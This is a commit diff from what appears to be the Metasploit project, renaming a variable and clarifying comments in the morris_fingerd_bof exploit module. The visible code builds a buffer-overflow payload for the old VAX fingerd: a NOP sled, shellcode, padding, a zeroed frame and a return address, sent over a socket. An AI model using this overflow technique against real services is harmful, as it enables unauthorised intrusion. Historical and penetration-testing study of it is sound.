Explain "junk" in buffer for morris_fingerd_bof

And unrelated whitespace changes because I suck.
GSoC/Meterpreter_Web_Console
William Vu 2018-11-22 23:10:57 -06:00
parent f2f5b3c8fa
commit 8a402da056
1 changed files with 4 additions and 5 deletions


@ -85,24 +85,23 @@ class MetasploitModule < Msf::Exploit::Remote
# 0x01 is NOP in VAX-speak # 0x01 is NOP in VAX-speak
nops = "\x01" * (target.payload_space - shellcode.length) nops = "\x01" * (target.payload_space - shellcode.length)
# This overwrites part of the buffer # This pads past buffer corruption
junk = rand_text_alphanumeric(109) padding = rand_text_alphanumeric(109)
# This zeroes out part of the stack frame # This zeroes out part of the stack frame
frame = "\x00" * 16 frame = "\x00" * 16
# Finally, pack in our return address # Finally, pack in our return address
ret = [target.ret].pack('V') # V is for VAX! ret = [target.ret].pack('V') # V is for VAX!
# The newline is for gets(3) # The newline is for gets(3)
sploit = nops + shellcode + junk + frame + ret + "\n" sploit = nops + shellcode + padding + frame + ret + "\n"
# Fire away # Fire away
print_status('Connecting to fingerd') print_status('Connecting to fingerd')
connect connect
print_status("Sending #{sploit.length}-byte buffer") print_status("Sending #{sploit.length}-byte buffer")
sock.put(sploit) sock.put(sploit)
# Hat tip @bcoles # Hat tip @bcoles
rescue Rex::ConnectionError => e rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message) fail_with(Failure::Unreachable, e.message)